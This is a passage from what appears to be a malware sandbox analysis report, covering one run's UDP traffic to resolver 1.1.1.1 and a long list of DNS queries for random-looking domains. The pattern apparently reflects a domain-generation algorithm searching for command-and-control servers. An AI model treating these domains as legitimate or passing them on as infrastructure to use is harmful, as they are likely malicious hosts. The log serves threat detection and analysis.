                                                                                                                                                                                                            Sep 7, 2024 15:37:34.757158041 CEST5720753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:34.992266893 CEST5720753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.306989908 CEST53572071.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.307142973 CEST53572071.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.415749073 CEST5353553192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.425617933 CEST53535351.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.450012922 CEST5922553192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.461231947 CEST53592251.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.570264101 CEST6100753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.804574013 CEST53610071.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.808367968 CEST6068153192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:35.981951952 CEST53606811.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.085978031 CEST5677153192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.193051100 CEST53567711.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.195385933 CEST6082653192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.432676077 CEST53608261.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.539074898 CEST6041053192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.682975054 CEST53604101.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.685086966 CEST5713653192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.723067045 CEST53571361.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.838608027 CEST6050253192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.849231005 CEST53605021.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.854924917 CEST5350453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:36.864341974 CEST53535041.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.188143015 CEST5158953192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.420137882 CEST53515891.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.483095884 CEST6141353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.742445946 CEST6141353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.775645971 CEST53614131.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.778309107 CEST53614131.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.883394003 CEST5329953192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.979233027 CEST53532991.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:38.982351065 CEST5387453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:39.081104994 CEST53538741.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.571883917 CEST6250153192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.737711906 CEST53625011.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.795030117 CEST5715353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:42.956296921 CEST53571531.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.055358887 CEST5757753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.318571091 CEST53575771.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.346254110 CEST5684753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:43.523291111 CEST53568471.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.274811029 CEST6189953192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.434751034 CEST53618991.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.503232956 CEST5123153192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.680347919 CEST53512311.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.789700031 CEST6437353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.813241959 CEST53643731.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.819061041 CEST5157053192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.827653885 CEST53515701.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.930182934 CEST5544753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.939918995 CEST53554471.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.944263935 CEST4967653192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:45.982871056 CEST53496761.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.085993052 CEST5388353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.257740974 CEST53538831.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.259809017 CEST6512853192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:46.422454119 CEST53651281.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:48.829310894 CEST5364853192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.013833046 CEST53536481.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.018682957 CEST5840853192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.257594109 CEST5840853192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.267657995 CEST53584081.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:49.267672062 CEST53584081.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:52.805083990 CEST6215753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:52.852118969 CEST53621571.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:52.854727983 CEST5734753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:53.101277113 CEST5734753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:53.108170033 CEST53573471.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:53.138642073 CEST53573471.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:53.773926020 CEST6316353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.024019003 CEST6316353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.049421072 CEST53631631.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.049439907 CEST53631631.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.051827908 CEST5195153192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.069283009 CEST53519511.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.165100098 CEST5662453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.196952105 CEST53566241.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.202974081 CEST5339753192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.249034882 CEST53533971.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.351751089 CEST6178453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.448829889 CEST53617841.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.451472044 CEST5426253192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.692843914 CEST53542621.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.789252043 CEST5825953192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.796351910 CEST53582591.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.799510956 CEST5599353192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:54.901262045 CEST53559931.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.009727001 CEST5984653192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.019459009 CEST53598461.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.022922993 CEST5881053192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.288650990 CEST5881053192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.297687054 CEST53588101.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:55.297713041 CEST53588101.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.558234930 CEST5105653192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.574698925 CEST53510561.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.586287975 CEST5137453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.851383924 CEST5137453192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.939601898 CEST53513741.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:56.939619064 CEST53513741.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.351511955 CEST6435253192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.521019936 CEST53643521.1.1.1192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.783140898 CEST5215053192.168.2.31.1.1.1
                                                                                                                                                                                                            Sep 7, 2024 15:37:59.953196049 CEST53521501.1.1.1192.168.2.3

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Sep 7, 2024 15:33:55.591943979 CEST192.168.2.31.1.1.10x4e57Standard query (0)gmomhogqcqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:56.084733963 CEST192.168.2.31.1.1.10x6fc7Standard query (0)gmomhogqcqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:56.227324009 CEST192.168.2.31.1.1.10xfe8dStandard query (0)gcqiwuurhamq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:56.299889088 CEST192.168.2.31.1.1.10xbd94Standard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:57.288883924 CEST192.168.2.31.1.1.10xbd94Standard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:57.864247084 CEST192.168.2.31.1.1.10x2e9cStandard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:58.866853952 CEST192.168.2.31.1.1.10x2e9cStandard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:33:59.882415056 CEST192.168.2.31.1.1.10x2e9cStandard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:00.711277962 CEST192.168.2.31.1.1.10x656dStandard query (0)qhncbseaikqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:00.885015011 CEST192.168.2.31.1.1.10x1c17Standard query (0)qhncbseaikqo.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:01.039199114 CEST192.168.2.31.1.1.10x1461Standard query (0)msqnej.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:02.195631981 CEST192.168.2.31.1.1.10x48c0Standard query (0)qsmnhmikgb.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:03.501929998 CEST192.168.2.31.1.1.10xc38fStandard query (0)muizcaelkbpus.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.666685104 CEST192.168.2.31.1.1.10x2cdeStandard query (0)ssgum.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.747405052 CEST192.168.2.31.1.1.10xa6d3Standard query (0)ssgum.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.898727894 CEST192.168.2.31.1.1.10x9160Standard query (0)daqpka.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.918744087 CEST192.168.2.31.1.1.10x8932Standard query (0)daqpka.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:05.305258036 CEST192.168.2.31.1.1.10x96ccStandard query (0)bgrauma.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:05.469660044 CEST192.168.2.31.1.1.10x48a4Standard query (0)bgrauma.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:05.743639946 CEST192.168.2.31.1.1.10x96faStandard query (0)uesvxrdym.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:05.978290081 CEST192.168.2.31.1.1.10x6e6fStandard query (0)uesvxrdym.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:06.336180925 CEST192.168.2.31.1.1.10x9519Standard query (0)taesmoqeisc.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:06.374193907 CEST192.168.2.31.1.1.10x411aStandard query (0)taesmoqeisc.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:06.541455984 CEST192.168.2.31.1.1.10xc734Standard query (0)haofpecu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:07.711765051 CEST192.168.2.31.1.1.10x46ebStandard query (0)ipemvw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:07.915863991 CEST192.168.2.31.1.1.10x636dStandard query (0)ipemvw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:08.354717970 CEST192.168.2.31.1.1.10x9e1eStandard query (0)kwdscx.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.496428967 CEST192.168.2.31.1.1.10xbb2Standard query (0)lhorellqnmqnh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.543874025 CEST192.168.2.31.1.1.10xc409Standard query (0)lhorellqnmqnh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.773559093 CEST192.168.2.31.1.1.10x5251Standard query (0)yamijoovw.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.899065971 CEST192.168.2.31.1.1.10x7e8aStandard query (0)wrrfiqelyzq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:12.070419073 CEST192.168.2.31.1.1.10x2941Standard query (0)cmujuqlmdkg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:12.405172110 CEST192.168.2.31.1.1.10xc9d6Standard query (0)cmujuqlmdkg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:12.711271048 CEST192.168.2.31.1.1.10x2a1cStandard query (0)ecumwls.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.048008919 CEST192.168.2.31.1.1.10x7165Standard query (0)ecumwls.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.398983955 CEST192.168.2.31.1.1.10xb60cStandard query (0)fyuciecxgldyb.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:14.555351019 CEST192.168.2.31.1.1.10x7d32Standard query (0)cwgbto.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:14.732665062 CEST192.168.2.31.1.1.10xa26dStandard query (0)cwgbto.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.008462906 CEST192.168.2.31.1.1.10x43f0Standard query (0)vcmiwoi.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.180350065 CEST192.168.2.31.1.1.10x24a4Standard query (0)nnwivnbqu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.192759037 CEST192.168.2.31.1.1.10xb756Standard query (0)nnwivnbqu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.304986000 CEST192.168.2.31.1.1.10x5a52Standard query (0)iftwbsbhi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.342518091 CEST192.168.2.31.1.1.10x6c41Standard query (0)iftwbsbhi.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.496365070 CEST192.168.2.31.1.1.10x2f7bStandard query (0)imctsikhqfmox.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.535823107 CEST192.168.2.31.1.1.10x8ec8Standard query (0)imctsikhqfmox.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.680529118 CEST192.168.2.31.1.1.10x6c90Standard query (0)wkgxyjabnhynde.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.820708036 CEST192.168.2.31.1.1.10xf10eStandard query (0)kowrxnw.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.997036934 CEST192.168.2.31.1.1.10x5f84Standard query (0)kowrxnw.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:18.336199045 CEST192.168.2.31.1.1.10x392aStandard query (0)xytag.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:18.833149910 CEST192.168.2.31.1.1.10x4217Standard query (0)xytag.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:19.476948977 CEST192.168.2.31.1.1.10x90b7Standard query (0)xnzakgk.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:19.489305973 CEST192.168.2.31.1.1.10x7b9dStandard query (0)xnzakgk.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:19.961270094 CEST192.168.2.31.1.1.10xde35Standard query (0)gimamgpmfgycu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:19.973440886 CEST192.168.2.31.1.1.10x888cStandard query (0)gimamgpmfgycu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.086297989 CEST192.168.2.31.1.1.10xa537Standard query (0)lfcwiw.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.227032900 CEST192.168.2.31.1.1.10xa540Standard query (0)vnsudgrujuqaw.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.382961988 CEST192.168.2.31.1.1.10xb46dStandard query (0)menrzwzda.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.403379917 CEST192.168.2.31.1.1.10x5efaStandard query (0)menrzwzda.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.851963043 CEST192.168.2.31.1.1.10xf0b4Standard query (0)goejwtwioknhq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:23.094985962 CEST192.168.2.31.1.1.10x7b95Standard query (0)goejwtwioknhq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:23.461278915 CEST192.168.2.31.1.1.10xbf35Standard query (0)oigqdcmjr.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:23.486005068 CEST192.168.2.31.1.1.10x379aStandard query (0)oigqdcmjr.cgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:23.664226055 CEST192.168.2.31.1.1.10x29faStandard query (0)unmzmwhqqjn.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:23.829067945 CEST192.168.2.31.1.1.10xc238Standard query (0)unmzmwhqqjn.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:24.105256081 CEST192.168.2.31.1.1.10xfd6eStandard query (0)iuzmbo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:24.449109077 CEST192.168.2.31.1.1.10xb60bStandard query (0)iuzmbo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:25.195549965 CEST192.168.2.31.1.1.10x14deStandard query (0)zaspgiv.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:25.359867096 CEST192.168.2.31.1.1.10x7977Standard query (0)zaspgiv.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:25.635565996 CEST192.168.2.31.1.1.10x511fStandard query (0)kccsaqgsvsa.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:25.678064108 CEST192.168.2.31.1.1.10x29bdStandard query (0)kccsaqgsvsa.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.664117098 CEST192.168.2.31.1.1.10x29bdStandard query (0)kccsaqgsvsa.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.945522070 CEST192.168.2.31.1.1.10xb6e8Standard query (0)rgqgidaugywcg.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.086059093 CEST192.168.2.31.1.1.10x8128Standard query (0)dqfudtqqvpha.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.135274887 CEST192.168.2.31.1.1.10xfe2eStandard query (0)dqfudtqqvpha.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:28.273628950 CEST192.168.2.31.1.1.10xc60dStandard query (0)btmcgia.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.398515940 CEST192.168.2.31.1.1.10x4718Standard query (0)ihigogb.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.548501968 CEST192.168.2.31.1.1.10x3811Standard query (0)ihigogb.cmA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:29.883182049 CEST192.168.2.31.1.1.10xc6f0Standard query (0)uduywyte.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.167180061 CEST192.168.2.31.1.1.10x759Standard query (0)uduywyte.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:30.539459944 CEST192.168.2.31.1.1.10xdfd1Standard query (0)geocssarlwqkae.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:31.695586920 CEST192.168.2.31.1.1.10x15e9Standard query (0)niror.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.293363094 CEST192.168.2.31.1.1.10x632bStandard query (0)niror.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:32.476943016 CEST192.168.2.31.1.1.10xc3ffStandard query (0)pqqembk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.617346048 CEST192.168.2.31.1.1.10xd80bStandard query (0)ukikcexuo.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:33.667399883 CEST192.168.2.31.1.1.10x79c0Standard query (0)ukikcexuo.stA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.070677996 CEST192.168.2.31.1.1.10x953dStandard query (0)eksogaqiy.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.346889019 CEST192.168.2.31.1.1.10x2040Standard query (0)eksogaqiy.krA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:34.476872921 CEST192.168.2.31.1.1.10xd664Standard query (0)gwzyu.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.625382900 CEST192.168.2.31.1.1.10xf85dStandard query (0)eqcdijeomajywh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.686980963 CEST192.168.2.31.1.1.10xfc42Standard query (0)eqcdijeomajywh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.836473942 CEST192.168.2.31.1.1.10x5a4cStandard query (0)yebwfcrq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:35.940381050 CEST192.168.2.31.1.1.10x4044Standard query (0)yebwfcrq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.289177895 CEST192.168.2.31.1.1.10xe629Standard query (0)ywynxne.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.300821066 CEST192.168.2.31.1.1.10x367dStandard query (0)ywynxne.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:36.601778984 CEST192.168.2.31.1.1.10x31acStandard query (0)cefal.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:37.836195946 CEST192.168.2.31.1.1.10xa702Standard query (0)eiluyai.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.078674078 CEST192.168.2.31.1.1.10x77f1Standard query (0)eiluyai.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:38.289431095 CEST192.168.2.31.1.1.10x70a6Standard query (0)kkrsmqksico.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.414266109 CEST192.168.2.31.1.1.10x7ff0Standard query (0)wlopqesa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.539323092 CEST192.168.2.31.1.1.10x7883Standard query (0)gceocrmsm.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.696742058 CEST192.168.2.31.1.1.10x623bStandard query (0)aynyrapy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.797785997 CEST192.168.2.31.1.1.10xbd67Standard query (0)aynyrapy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:42.148536921 CEST192.168.2.31.1.1.10xa9cStandard query (0)loucml.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:42.665524960 CEST192.168.2.31.1.1.10xa0ffStandard query (0)loucml.rwA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:42.882994890 CEST192.168.2.31.1.1.10xfaf3Standard query (0)igeeqesxawmwom.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.054877996 CEST192.168.2.31.1.1.10xe0bdStandard query (0)igeeqesxawmwom.tkA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.336468935 CEST192.168.2.31.1.1.10x27e5Standard query (0)numuqgoyj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.351346970 CEST192.168.2.31.1.1.10x99a2Standard query (0)numuqgoyj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.477646112 CEST192.168.2.31.1.1.10x1e86Standard query (0)owpuc.cgA (IP address)IN (0x0001)false
